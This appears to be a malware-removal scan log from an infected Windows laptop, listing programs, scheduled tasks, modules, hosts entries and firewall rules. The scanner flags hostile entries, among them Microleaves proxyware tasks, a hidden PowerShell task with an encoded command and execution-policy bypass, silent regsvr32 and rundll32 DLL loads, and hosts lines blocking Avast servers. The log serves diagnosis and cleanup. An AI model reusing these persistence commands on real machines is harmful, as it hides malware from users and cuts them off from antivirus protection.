Online Application (HKLM-x32\...\{5266F634-7B7D-4537-BDDC-98DD6CFCBAA1}) (Version: 2.6.0 - Microleaves) <==== ATTENTION
Outils de vérification linguistique 2013 de Microsoft Office - Français (HKLM\...\{90150000-001F-040C-1000-0000000FF1CE}) (Version: 15.0.4420.1017 - Microsoft Corporation) Hidden
Outils de vérification linguistique 2016 de Microsoft Office - Français (HKLM-x32\...\{90160000-001F-040C-0000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
REALTEK Bluetooth Driver (HKLM-x32\...\{9D3D8C60-A5EF-4123-B2B9-172095903AB}) (Version: 1.0.0.48 - REALTEK Semiconductor Corp.)
Realtek Card Reader (HKLM-x32\...\{5BC2B5AB-80DE-4E83-B8CF-426902051D0A}) (Version: 6.3.9600.31213 - Realtek Semiconductor Corp.)
Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 10.1.505.2015 - Realtek)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7944 - Realtek Semiconductor Corp.)
REALTEK Wireless LAN Driver (HKLM-x32\...\{A5107464-AA9B-4177-8129-5FF2F42DD322}) (Version: 1.0.0.64 - REALTEK Semiconductor Corp.)
Skype Click to Call (HKLM-x32\...\{873F8E7C-10E6-449F-BD7E-5FBA7C8E1C9B}) (Version: 8.5.0.9167 - Microsoft Corporation)
Skype™ 7.1 (HKLM-x32\...\{24991BA0-F0EE-44AD-9CC8-5EC50AECF6B7}) (Version: 7.1.105 - Skype Technologies S.A.)
swMSM (HKLM-x32\...\{612C34C7-5E90-47D8-9B5C-0F717DD82726}) (Version: 12.0.0.1 - Adobe Systems, Inc) Hidden
Synaptics Pointing Device Driver (HKLM\...\SynTPDeinstKey) (Version: 19.3.11.45 - Synaptics Incorporated)
Taalprogramma's voor Microsoft Office 2016 - Nederlands (HKLM-x32\...\{90160000-001F-0413-0000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
UpdateAssistant (HKLM-x32\...\{DE45508F-369E-4476-8F19-088F4933340E}) (Version: 1.8.0.0 - Microsoft Corporation) Hidden
VLC media player (HKLM\...\VLC media player) (Version: 2.2.4 - VideoLAN)
Windows 10 Update and Privacy Settings (HKLM\...\{4DFCD818-036A-4229-A67D-CF17DC461D92}) (Version: 1.0.14.0 - Microsoft Corporation)
WinRAR 5.50 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.50.0 - win.rar GmbH)
==================== Custom CLSID (Whitelisted): ==========================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
ContextMenuHandlers1: [Adobe.Acrobat.ContextMenu] -> {A6595CD1-BF77-430A-A452-18696685F7C7} => C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat Elements\ContextMenuShim64.dll [2015-03-17] (Adobe Systems Inc.)
ContextMenuHandlers1: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2017-08-11] (Alexander Roshal)
ContextMenuHandlers1-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2017-08-11] (Alexander Roshal)
ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => -> No File
ContextMenuHandlers5: [igfxDTCM] -> {9B5F5829-A529-4B12-814A-E81BCB8D93FC} => C:\windows\system32\igfxDTCM.dll [2017-01-13] (Intel Corporation)
ContextMenuHandlers6: [Adobe.Acrobat.ContextMenu] -> {A6595CD1-BF77-430A-A452-18696685F7C7} => C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat Elements\ContextMenuShim64.dll [2015-03-17] (Adobe Systems Inc.)
ContextMenuHandlers6: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2017-08-11] (Alexander Roshal)
ContextMenuHandlers6-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2017-08-11] (Alexander Roshal)
==================== Scheduled Tasks (Whitelisted) =============
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
Task: {1010958B-E5D8-4171-89C1-165C30A04D56} - System32\Tasks\Hewlett-Packard\HP Support Assistant\PC Health Analysis Install => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe [2015-07-11] (Hewlett-Packard Company)
Task: {139A1B1F-6D28-4481-A5D9-099AAAFB9519} - System32\Tasks\7fa873b86c1118b0b18259f1000e475e => sc start 7fa873b86c1118b0b18259f1000e475e <==== ATTENTION
Task: {13CF2881-C49E-4152-ADA7-93B139A8832E} - System32\Tasks\HPGenoobeReminder => C:\Program Files (x86)\Hewlett-Packard\HP Registration Service\HP GenOOBE\HPGenOOBE.exe [2015-07-21] ()
Task: {1E6D8B0C-60E3-467D-9FDE-56CCED13CF9E} - System32\Tasks\DropboxOEM => C:\Program Files (x86)\Dropbox\DropboxOEM\DropboxOEM.exe [2016-09-21] ()
Task: {21650A89-7165-490E-977E-54015BA3148E} - System32\Tasks\DropboxUpdateTaskMachineUA => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [2017-09-04] (Dropbox, Inc.)
Task: {2206D613-977D-4474-8462-BB9230C86123} - System32\Tasks\Hewlett-Packard\HP Support Assistant\PC Health Analysis => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe [2015-07-11] (Hewlett-Packard Company)
Task: {2858581D-03A7-44A9-8DC2-FC25D50DF64E} - System32\Tasks\Hewlett-Packard\HP Support Assistant\First Boot => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF_Utils.exe [2015-07-11] (Hewlett-Packard Company)
Task: {28960C04-679F-4C4B-8E95-8BEEE992E191} - System32\Tasks\Microsoft Office 15 Sync Maintenance for LAPTOP-RUV870D4-hp LAPTOP-RUV870D4 => C:\Program Files\Microsoft Office\Office15\MsoSync.exe [2012-10-01] (Microsoft Corporation)
Task: {355766DF-D606-4B38-AB12-6C432287F332} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentLogOn => C:\Program Files\Microsoft Office\Office15\msoia.exe [2012-10-01] (Microsoft Corporation)
Task: {42CA5393-7368-465F-89B2-EA14BBDB7B06} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentLogOn2016 => C:\Program Files\Microsoft Office\Office16\msoia.exe [2015-07-31] (Microsoft Corporation)
Task: {4830AA1C-FE63-498A-B129-60CB93A5F4FE} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentFallBack => C:\Program Files\Microsoft Office\Office15\msoia.exe [2012-10-01] (Microsoft Corporation)
Task: {4BFDC474-42FA-4F48-87EE-2A0116EA9959} - System32\Tasks\DropboxUpdateTaskMachineCore => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [2017-09-04] (Dropbox, Inc.)
Task: {5DA1BAC6-AE17-4223-AD36-CE8E71265DBD} - System32\Tasks\YCMServiceAgent => C:\Program Files (x86)\CyberLink\YouCam6\YouCamService6.exe [2015-10-29] (CyberLink Corp.)
Task: {5ED0DC8D-47FA-48C1-8CE0-AE41715D3DB1} - System32\Tasks\Compare MP3 Two Jambers => C:\windows\system32\rundll32.exe "C:\Program Files\Compare MP3 Two Jambers\Compare MP3 Two Jambers.dll",mAtzsLM <==== ATTENTION
Task: {6D3D65C6-8508-42F3-B0CB-4C4D35C7B37B} - System32\Tasks\Online Application V2G3 => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe [2017-02-07] (Microleaves LTD) <==== ATTENTION
Task: {6D918782-94FA-4DF8-B4DB-9A25F9E6DC10} - System32\Tasks\{D48E529E-DB33-75A3-0773-49F002B2650A} => C:\windows\system32\regsvr32.exe /s /n /i:"/rt" "C:\PROGRA~3\f3810094\ce8fc3e9.dll" <==== ATTENTION
Task: {7B9D4088-5C2F-4CD6-AC43-FB6EA30B68C4} - System32\Tasks\RegistrationModuleReminder_Welcome-S-1-5-21-2924308242-708578159-770495721-1001 => C:\Program Files\HP\HP Welcome\Garage.Container.exe [2015-12-05] (HP Inc)
Task: {7D803203-4DFF-49FF-8F0B-F5EC65F2367E} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2017-03-05] (Google Inc.)
Task: {960DAD80-5E06-44B8-913D-A32DCAB0CF0D} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2017-07-19] (Adobe Systems Incorporated)
Task: {A62C39DB-1880-45DB-9E90-6C00E9E8F77D} - System32\Tasks\Online Application V2G1 => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe [2017-02-07] (Microleaves LTD) <==== ATTENTION
Task: {A88C09C4-2CEA-4C9E-8C09-6098D9E4564A} - System32\Tasks\2ad9e22f09e61569c5eee072af04d2ab => powershell.exe -NoProfile -NoLogo -NonInteractive -ExecutionPolicy Bypass -File "C:\windows\2ad9e22f09e61569c5eee072af04d2ab.ps1" <==== ATTENTION
Task: {AE3DEA1A-7546-4121-8D51-0AE40D3A2EA9} - System32\Tasks\{04087847-0979-050E-7911-787E0F0F110B} => C:\windows\system32\WindowsPowershell\v1.0\powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand OwA7ACAAIAAgACAAOwAgACAAIAAgADsAOwAgACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAPQAiAHMAdABvAHAAIgA7ACQAcwBjAD0AIgBTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlACIAOwAkAFcAYQByAG4AaQBuAGcAUAByAGUAZgBlAHIA (the data entry has 9640 more characters). <==== ATTENTION
Task: {B58C15BF-2D73-4470-8FC3-9B8B6DD2B83E} - System32\Tasks\All RCover => C:\windows\system32\rundll32.exe "C:\Program Files\All RCover\All RCover.dll",hoRKzFFPwe <==== ATTENTION
Task: {C12D104A-32EC-4B82-B9B7-5A5734BAC991} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Active Health Launcher => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPActiveHealth\ActiveHealth.exe [2015-06-19] (Hewlett-Packard)
Task: {C34904E2-0F29-4316-8B39-DC5C66E3A234} - System32\Tasks\{527C378A-E5D7-8021-846A-4F27D586AB30} => C:\ProgramData\{ECCDBBF9-5B66-0C52-A48B-6E9C049282A4}\1703B031-A0A8-079A-90C3-63DE1B44B925.exe [2017-10-09] () <==== ATTENTION
Task: {CF362911-599D-4AE2-A90C-A832263F93D2} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentFallBack2016 => C:\Program Files\Microsoft Office\Office16\msoia.exe [2015-07-31] (Microsoft Corporation)
Task: {D1287AAC-2CCD-4FF7-8BF2-8E928740BBC3} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2017-03-05] (Google Inc.)
Task: {D1B6948B-1724-4B70-93D8-8DB0BF4166C6} - System32\Tasks\Updater_Online_Application => C:\Program Files (x86)\Microleaves\Online Application\Online Application Updater.exe [2017-06-18] (Microleaves) <==== ATTENTION
Task: {D6044C2D-9503-4D61-B4FA-44C5409EDDC2} - System32\Tasks\Online Application V2G2 => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe [2017-02-07] (Microleaves LTD) <==== ATTENTION
Task: {DFCB2C5E-1CA2-472E-A6D8-44596FE6E2DB} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Assistant Quick Start => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe [2015-07-11] (Hewlett-Packard Company)
Task: {E3C7774B-7972-435E-A14C-B942EC08FC35} - System32\Tasks\HP Metrics => C:\Program Files\HP\HP Welcome\Garage.Container.exe [2015-12-05] (HP Inc)
Task: {E8D11DFA-A6D0-4B9F-9709-111B7F11583E} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Solutions Framework Updater => C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\Modules\HPSSFUpdater.exe [2017-09-20] (HP Inc.)
Task: {EF112D44-9647-4011-BE82-021FA91D02EA} - System32\Tasks\Adobe Flash Player PPAPI Notifier => C:\windows\SysWOW64\Macromed\Flash\FlashUtil32_27_0_0_130_pepper.exe [2017-09-14] (Adobe Systems Incorporated)
Task: {F73511E3-809A-4C49-B0A2-D8DB853F3B15} - System32\Tasks\Adobe Flash Player Updater => C:\windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2017-09-14] (Adobe Systems Incorporated)
Task: {FDF94A2E-6CA2-4475-8D6D-875E8CA58E0D} - System32\Tasks\Microsoft\Office\Office 15 Subscription Heartbeat => C:\Program Files\Common Files\Microsoft Shared\Office15\OLicenseHeartbeat.exe [2012-10-01] (Microsoft Corporation)
(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)
Task: C:\windows\Tasks\DropboxUpdateTaskMachineCore.job => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe
Task: C:\windows\Tasks\DropboxUpdateTaskMachineUA.job => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe
Task: C:\windows\Tasks\Online Application V2G1.job => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe <==== ATTENTION
Task: C:\windows\Tasks\Online Application V2G2.job => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe <==== ATTENTION
Task: C:\windows\Tasks\Online Application V2G3.job => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe <==== ATTENTION
Task: C:\windows\Tasks\Updater_Online_Application.job => C:\Program Files (x86)\Microleaves\Online Application\Online Application Updater.exe <==== ATTENTION
==================== Shortcuts & WMI ========================
(The entries could be listed to be restored or removed.)
ShortcutWithArgument: C:\Users\hp.LAPTOP-RUV870D4\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\AmazonShopping.lnk -> C:\Program Files (x86)\Hewlett-Packard\Shared\WizLink.exe () -> hxxp://www.amazon.com/gp/bit/amazonbookmark.html?tag=hp2-desktop-us-20&partner=HP
ShortcutWithArgument: C:\Users\hp.LAPTOP-RUV870D4\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\TripAdvisor.lnk -> C:\Program Files (x86)\Hewlett-Packard\Shared\WizLink.exe () -> hxxp://js.redirect.hp.com/jumpstation?bd=all&c=none&locale=all&pf=cnnb&s=TripAdvisor_W10_taskbar&tp=Taskbar
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk -> C:\Program Files\Mozilla Firefox\firefox.exe (Mozilla Corporation) -> hxxp://www.yeadesktop.com/
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Priceline.com.lnk -> C:\Program Files (x86)\Hewlett-Packard\Shared\WizLink.exe () -> hxxp://www.priceline.com/?refid=PLHBC6240OPQ&refclickid=square
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --disable-quic
ShortcutWithArgument: C:\Users\Public\Desktop\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> hxxp://www.yeadesktop.com/ --disable-quic
ShortcutWithArgument: C:\Users\Public\Desktop\Mozilla Firefox.lnk -> C:\Program Files\Mozilla Firefox\firefox.exe (Mozilla Corporation) -> hxxp://www.yeadesktop.com/
==================== Loaded Modules (Whitelisted) ==============
2017-09-04 11:06 - 2017-03-04 05:31 - 000185856 _____ () C:\windows\SYSTEM32\ism32k.dll
2017-09-02 23:01 - 2015-05-31 23:04 - 002448384 _____ () C:\Program Files\Compare MP3 Two Jambers\Compare MP3 Two Jambers.dll
2017-09-02 23:01 - 2017-08-25 22:33 - 001952256 ___SH () C:\Users\hp.LAPTOP-RUV870D4\AppData\Roaming\tmp546.dat
2017-09-25 15:18 - 2017-09-05 09:29 - 001360072 ____N () C:\Windows\system32\LanmaMasterHelp.dll
2016-12-15 03:15 - 2015-11-19 23:44 - 000127192 _____ () C:\Program Files (x86)\REALTEK\Realtek Bluetooth\BTDevMgr.exe
2016-12-15 03:36 - 2014-04-15 02:59 - 000389896 _____ () C:\Program Files\CyberLink\Shared files\RichVideo64.exe
2017-09-08 10:18 - 2017-09-08 10:18 - 003430912 _____ () C:\windows\windefender.exe
2017-09-25 15:18 - 2017-09-05 09:31 - 002656960 _____ () C:\windows\system32\CoreUIComponents.dll
2016-12-15 02:55 - 2016-12-15 02:55 - 000093696 _____ () C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\Windows.UI.Shell.SharedUtilities.dll
2017-09-04 11:07 - 2016-07-01 03:48 - 000472064 _____ () C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\QuickActions.dll
2017-09-04 11:05 - 2017-03-04 03:19 - 007992832 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CortanaApi.dll
2017-09-04 11:05 - 2017-03-04 03:14 - 000591360 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll
2017-09-25 15:18 - 2017-09-05 04:03 - 002483200 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.BackgroundTask.dll
2017-09-25 15:18 - 2017-09-05 04:06 - 004089856 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\RemindersUI.dll
2017-09-08 10:14 - 2017-09-08 10:14 - 001247232 _____ () C:\Program Files\ZYSCVDO2L7\TDAJNHELG.exe
2017-09-08 10:15 - 2017-09-08 10:15 - 001247232 _____ () C:\Program Files\VLULHWYIV2\6989W5Y8C.exe
2017-09-08 10:15 - 2017-09-08 10:15 - 001247232 _____ () C:\Program Files\8ICSDJKCA8\8ICSDJKCA.exe
2017-09-08 10:46 - 2017-09-08 10:47 - 001247232 _____ () C:\Program Files\IEKQ8ZH03D\IEKQ8ZH03.exe
2017-09-08 10:47 - 2017-09-08 10:47 - 001247232 _____ () C:\Program Files\336K7Z08RL\336K7Z08R.exe
2017-10-09 12:11 - 2017-10-10 09:49 - 000567296 _____ () C:\windows\TEMP\g8532.tmp.exe
2015-03-17 00:34 - 2015-03-17 00:34 - 000010240 _____ () C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\locale\fr_fr\acrotray.fra
==================== Alternate Data Streams (Whitelisted) =========
(If an entry is included in the fixlist, only the ADS will be removed.)
==================== Safe Mode (Whitelisted) ===================
(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\McMPFSvc => ""="Service"
==================== Association (Whitelisted) ===============
(If an entry is included in the fixlist, the registry item will be restored to default or removed.)
==================== Internet Explorer trusted/restricted ===============
(If an entry is included in the fixlist, it will be removed from the registry.)
==================== Hosts content: ==========================
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
2015-10-30 07:24 - 2017-09-14 21:02 - 000013941 _____ C:\windows\system32\Drivers\etc\hosts
127.0.0.1 cpm.paneladmin.pro
127.0.0.1 publisher.hmdiadmingate.xyz
127.0.0.1 distribution.hmdiadmingate.xyz
127.0.0.1 hmdicrewtracksystem.xyz
127.0.0.1 linkmate.space
127.0.0.1 space1.adminpressure.space
127.0.0.1 trackpressure.website
127.0.0.1 doctorlink.space
127.0.0.1 plugpackdownload.net
127.0.0.1 texttotalk.org
127.0.0.1 gambling577.xyz
127.0.0.1 htagdownload.space
127.0.0.1 mybcnmonetize.com
127.0.0.1 360devtraking.website
127.0.0.1 dscdn.pw
127.0.0.1 beautifllink.xyz
127.0.0.1 gf.tools.avast.com
127.0.0.1 pair.ff.avast.com
127.0.0.1 ipm-provider.ff.avast.com
127.0.0.1 ipm-provider.ff.avast.com
127.0.0.1 ipm-provider.ff.avast.com
127.0.0.1 id.avast.com
127.0.0.1 v4618535.iavs9x.u.avast.com
127.0.0.1 v4618535.ivps9x.u.avast.com
127.0.0.1 v4618535.ivps9tiny.u.avast.com
127.0.0.1 v4618535.vpsnitro.u.avast.com
127.0.0.1 v4618535.vpsnitrotiny.u.avast.com
127.0.0.1 v4618535.iavs5x.u.avast.com
127.0.0.1 v7.stats.avast.com
127.0.0.1 v7.stats.avast.com
There are 348 more lines.
==================== Other Areas ============================
(Currently there is no automatic fix for this section.)
HKU\S-1-5-21-2924308242-708578159-770495721-1002\Control Panel\Desktop\\Wallpaper -> C:\windows\web\wallpaper\Hewlett-Packard Backgrounds\backgroundDefault.jpg
DNS Servers: Media is not connected to internet.
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: Off)
Windows Firewall is enabled.
==================== MSCONFIG/TASK MANAGER disabled items ==
HKU\S-1-5-21-2924308242-708578159-770495721-1002\...\StartupApproved\Run: => "ZSZTCNJ2OMKV55I"
HKU\S-1-5-21-2924308242-708578159-770495721-1002\...\StartupApproved\Run: => "35UF2TJYS7GUZCF"
HKU\S-1-5-21-2924308242-708578159-770495721-1002\...\StartupApproved\Run: => "X9MR35AQD7KQ5KM"
HKU\S-1-5-21-2924308242-708578159-770495721-1002\...\StartupApproved\Run: => "H8S7UD3RNIBVABD"
HKU\S-1-5-21-2924308242-708578159-770495721-1002\...\StartupApproved\Run: => "TREB6DLEK9Y2AU6"
HKU\S-1-5-21-2924308242-708578159-770495721-1002\...\StartupApproved\Run: => "SKLLNIIF73187T7"
HKU\S-1-5-21-2924308242-708578159-770495721-1002\...\StartupApproved\Run: => "41TMXCH4BKVE27Q"
HKU\S-1-5-21-2924308242-708578159-770495721-1002\...\StartupApproved\Run: => "msiql"
HKU\S-1-5-21-2924308242-708578159-770495721-1002\...\StartupApproved\Run: => "0O8K7L6I4PLKLKA"
HKU\S-1-5-21-2924308242-708578159-770495721-1002\...\StartupApproved\Run: => "2CB4OUAQHFKB0TG"
==================== FirewallRules (Whitelisted) ===============
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
FirewallRules: [{06264B65-F981-4F5C-8FC0-383E9BE4F57D}] => (Allow) C:\Program Files (x86)\Hewlett-Packard\HP System Event\HPSOCKSVC.exe
FirewallRules: [{C5004A9E-30D4-4BE9-8EE3-A78223ECDCF8}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{6E01A0D3-06E8-4F3E-B3A2-A5C7E5563C4B}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{95D0A191-57C4-4D9B-819E-70C476BDA449}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{3A1C70EC-D8A7-4A8A-B8E4-EFBF49D24833}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{BB27264A-ED10-46E7-A76C-BABF13ED321F}] => (Allow) c:\Program Files\CyberLink\PowerDirector12\PDR10.EXE
FirewallRules: [{3EEC113D-2136-4D90-8939-8CD273B825B1}] => (Allow) C:\Program Files (x86)\CyberLink\PowerDVD14\PowerDVD.exe
FirewallRules: [{AF3D5CF7-E5D0-477D-BDA2-35EA55CC1369}] => (Allow) C:\Program Files (x86)\CyberLink\PowerDVD14\Kernel\DMS\CLMSServerPDVD14.exe
FirewallRules: [{A9345FFE-2D51-49CE-A79D-76BFD7B61C74}] => (Allow) C:\Program Files (x86)\CyberLink\PowerDVD14\PowerDVD14Agent.exe
FirewallRules: [{A4088A32-DC7F-4324-A8FF-C2E57379232B}] => (Allow) C:\Program Files (x86)\CyberLink\PowerDVD14\Movie\PowerDVDMovie.exe
FirewallRules: [{C492F773-8EEE-45F0-9164-A8F3898BF7AF}] => (Allow) C:\Program Files (x86)\CyberLink\PowerDVD14\Movie\PowerDVD Cinema\PowerDVDCinema.exe
FirewallRules: [{35F53E17-E1CD-4F91-8F98-963F1BE66F4A}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [{C24AE935-954A-4E58-B25F-776F3B5042D1}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe
FirewallRules: [{6DE5D107-86BC-4DCA-9293-E27FB89C81DD}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe
FirewallRules: [{363BF103-F490-43A2-A799-64A51BFE0C32}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
FirewallRules: [{719E644A-35BC-41DB-A7A2-90AC9EB9EFC4}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\Lync.exe
FirewallRules: [{32EA4C83-28E9-4379-8A75-DE889303E930}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\UcMapi.exe
FirewallRules: [{33F4DDED-84DA-428C-8ED5-35B64A8C6F1F}] => (Allow) C:\windows\system32\rundll32.exe
FirewallRules: [{A075DD94-B943-41C2-994A-27BB5312A3A5}] => (Allow) C:\Program Files (x86)\Microsoft Office\Office16\lync.exe
FirewallRules: [{EF6020DC-EA23-4BE3-88B4-2DB0DFE16028}] => (Allow) C:\Program Files (x86)\Microsoft Office\Office16\lync.exe
FirewallRules: [{F98083A0-45CD-4A75-894D-7350B7B28EEC}] => (Allow) C:\Program Files (x86)\Microsoft Office\Office16\UcMapi.exe
FirewallRules: [{AE9F890A-8451-43A5-982B-3C87F92CD1F5}] => (Allow) C:\Program Files (x86)\Microsoft Office\Office16\UcMapi.exe
FirewallRules: [{67E81FF5-CC85-474E-A85F-02ABA3F15074}] => (Allow) C:\windows\rss\csrss.exe
FirewallRules: [{D8482D6E-30DC-41C4-9099-A2E6F7E2FE8C}] => (Allow) C:\Users\hp\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe
FirewallRules: [{3A2BD150-85F0-4CDC-B44D-EE5466DDF595}] => (Allow) C:\Windows\System32\rundll32.exe
FirewallRules: [{694857C4-E544-4654-8A19-33E879DDA294}] => (Allow) C:\Windows\System32\rundll32.exe
FirewallRules: [{50531857-024B-4F49-8F9B-8EFF8AC84DC8}] => (Allow) C:\Users\hp.LAPTOP-RUV870D4\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{B2416515-41F5-4AD0-B6BC-53B995D2876E}] => (Allow) C:\Users\hp.LAPTOP-RUV870D4\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{D8292B6D-282B-433C-A8B7-7106B8E747AA}] => (Allow) C:\Program Files\IBM\SPSS\Statistics\21\WinWrapIDE.exe
FirewallRules: [{71CBB400-560D-41D9-94C7-E9CA6CAA5C88}] => (Allow) C:\Program Files\IBM\SPSS\Statistics\21\stats.com
FirewallRules: [{4F9DB7F4-D4A5-4DF3-804D-ACF6109E7A50}] => (Allow) C:\Program Files\IBM\SPSS\Statistics\21\stats.exe
FirewallRules: [{B722624C-6D84-4CD6-89AC-A924F92E97D6}] => (Allow) C:\Program Files\IBM\SPSS\Statistics\21\WinWrapIDE.exe
FirewallRules: [{A362540A-61EB-4605-B97B-F9EA1DA07E50}] => (Allow) C:\Program Files\IBM\SPSS\Statistics\21\stats.com
FirewallRules: [{0B90A5D0-0E5A-4370-84AD-890B3203ED1F}] => (Allow) C:\Program Files\IBM\SPSS\Statistics\21\stats.exe
FirewallRules: [TCP Query User{265E2C51-BAA7-480E-BB25-11392E176DA7}C:\program files\ibm\spss\statistics\21\jre\bin\javaw.exe] => (Allow) C:\program files\ibm\spss\statistics\21\jre\bin\javaw.exe
FirewallRules: [UDP Query User{18C572C8-069C-4985-AB0F-78227D1B2091}C:\program files\ibm\spss\statistics\21\jre\bin\javaw.exe] => (Allow) C:\program files\ibm\spss\statistics\21\jre\bin\javaw.exe
FirewallRules: [{604268B5-F0E1-4F5B-A7EF-02B33E6633F3}] => (Allow) C:\Windows\System32\rundll32.exe
FirewallRules: [{32352ADE-B07C-4804-BEE7-43E71117924B}] => (Allow) C:\Windows\System32\rundll32.exe
==================== Restore Points =========================
25-09-2017 15:20:04 Windows Update
30-09-2017 06:59:58 Installed IBM SPSS Statistics 21 Developer.
09-10-2017 12:16:48 Windows Update
==================== Faulty Device Manager Devices =============
==================== Event log errors: =========================
Application errors:
==================
Error: (10/10/2017 10:20:57 AM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: LAPTOP-RUV870D4)
Description: Échec de l’activation de l’application Microsoft.MicrosoftEdge_8wekyb3d8bbwe!MicrosoftEdge avec l’erreur : -2144927142 Pour plus d’informations, voir le journal Microsoft-Windows-TWinUI/Opérationnel.
Error: (10/10/2017 10:17:47 AM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 2484) (User: LAPTOP-RUV870D4)
Description: Le package Microsoft.MicrosoftEdge_25.10586.672.0_neutral__8wekyb3d8bbwe+MicrosoftEdge#{ccd03aa8-f336-408a-9f6c-e81dee0a4486} a été interrompu, car sa suspension a été trop longue.
Error: (10/10/2017 10:17:45 AM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 2484) (User: LAPTOP-RUV870D4)
